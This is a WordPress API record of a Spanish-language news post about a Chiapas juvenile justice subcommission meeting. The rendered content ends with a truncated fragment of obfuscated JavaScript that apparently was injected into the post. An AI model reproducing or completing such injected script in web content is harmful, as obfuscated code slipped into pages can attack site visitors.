{"id":7123,"date":"2022-12-02T01:13:02","date_gmt":"2022-12-02T01:13:02","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=7123"},"modified":"2022-12-02T01:13:03","modified_gmt":"2022-12-02T01:13:03","slug":"coadyuvan-poder-judicial-y-sipinna-con-ley-nacional-del-sistema-de-justicia-penal-para-adolescentes","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=7123","title":{"rendered":"Coadyuvan Poder Judicial y Sipinna con Ley Nacional del Sistema de Justicia Penal para Adolescentes"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"480\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/FB_IMG_1669936435705.jpg\" alt=\"\" class=\"wp-image-7124\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/FB_IMG_1669936435705.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/FB_IMG_1669936435705-300x200.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>01 de Diciembre del 2022. Tuxtla Guti\u00e9rrez, Chiapas. &#8211; El Poder Judicial del Estado fungi\u00f3 como sede para la realizaci\u00f3n de la Tercera Sesi\u00f3n Ordinaria de la Subcomisi\u00f3n de Justicia Penal para Adolescentes, en donde el magistrado presidente del Tribunal Superior de Justicia y Consejo de la Judicatura, Guillermo Ramos P\u00e9rez, funge como coordinador.<br>El objetivo primordial de esta sesi\u00f3n, fue la presentaci\u00f3n del resultado del cumplimiento de los planes de trabajo actividades, estrategias de cada instituci\u00f3n que integran el Sistema Integral de Justicia Penal para Adolescentes, conforme a su \u00e1mbito de competencia.<\/p>\n\n\n\n<p>Por lo que, durante esta sesi\u00f3n, la juez especializada en Justicia para Adolescentes, Jaqueline \u00c1ngel Juan, agradeci\u00f3 a las y los representantes de las instituciones, dependencias y \u00f3rganos que integran esta Subcomisi\u00f3n de Justicia Penal para Adolescentes, el compromiso demostrado en el trabajo a favor de garantizar los derechos de las personas en conflicto con la ley y lograr la eficiente implementaci\u00f3n de la Ley Nacional.<\/p>\n\n\n\n<p>Por su parte, la secretaria ejecutiva del Sipinna Chiapas, Marisol G\u00f3mez Hern\u00e1ndez, record\u00f3 que los trabajos que se realizan desde esta Subcomisi\u00f3n son de vital importancia, porque hablar de justicia para adolescentes, representa un gran reto, porque no se habla de castigos, sino de c\u00f3mo buscar que el adolescente que est\u00e1 en conflicto con la ley, logre una reintegraci\u00f3n social y tenga una perspectiva para adaptarse.<\/p>\n\n\n\n<p>Durante su participaci\u00f3n, la secretaria t\u00e9cnica de la Comisi\u00f3n Interinstitucional para la implementaci\u00f3n de la Reforma Constitucional en materia de Seguridad y Justicia Penal en el Estado, de la cual forma parte esta Subcomisi\u00f3n de Justicia para Adolescentes, Karla Qui\u00f1ones Rodr\u00edguez, inform\u00f3 que se elabor\u00f3 una Gu\u00eda Institucional para la Implementaci\u00f3n al Sistema de Justicia, donde se marcan lineamientos para seguir consolidando este sistema en la entidad, as\u00ed como la profesionalizaci\u00f3n de operadores y su certificaci\u00f3n.<\/p>\n\n\n\n<p>En esta reuni\u00f3n presentaron los resultados de sus planes de trabajo las y los representantes de la Fiscal\u00eda General del Estado, la Secretar\u00eda de Salud, la Secretar\u00eda de Educaci\u00f3n, la Secretar\u00eda de Econom\u00eda y del Trabajo, la Secretar\u00eda de Seguridad y Protecci\u00f3n Ciudadana, Comisi\u00f3n Ejecutiva Estatal de Atenci\u00f3n a V\u00edctimas, el Tribunal Superior de Justicia del Estado, Centro Estatal para la Prevenci\u00f3n Social de la Violencia y Participaci\u00f3n Ciudadana, la Comisi\u00f3n Estatal de los Derechos Humanos, el Instituto de la Defensor\u00eda P\u00fablica del Estado, el Centro Estatal de Justicia Alternativa, la Procuradur\u00eda de Protecci\u00f3n de Derechos de Ni\u00f1as, Ni\u00f1os y Adolescentes, el Instituto del Deporte, el Instituto de la juventud y el Centro para la Prevenci\u00f3n y Tratamiento contra las Adicciones.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>01 de Diciembre del 2022. Tuxtla Guti\u00e9rrez, Chiapas. &#8211; El Poder Judicial del Estado fungi\u00f3 como sede para la realizaci\u00f3n de la Tercera Sesi\u00f3n Ordinaria de la Subcomisi\u00f3n de Justicia Penal para Adolescentes, en donde el magistrado presidente del Tribunal Superior de Justicia y Consejo de la Judicatura, Guillermo Ramos P\u00e9rez, funge como coordinador.El objetivo &hellip;<\/p>\n","protected":false},"author":2,"featured_media":7124,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-7123","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7123","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7123"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7123\/revisions"}],"predecessor-version":[{"id":7125,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7123\/revisions\/7125"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/7124"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7123"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7123"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7123"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}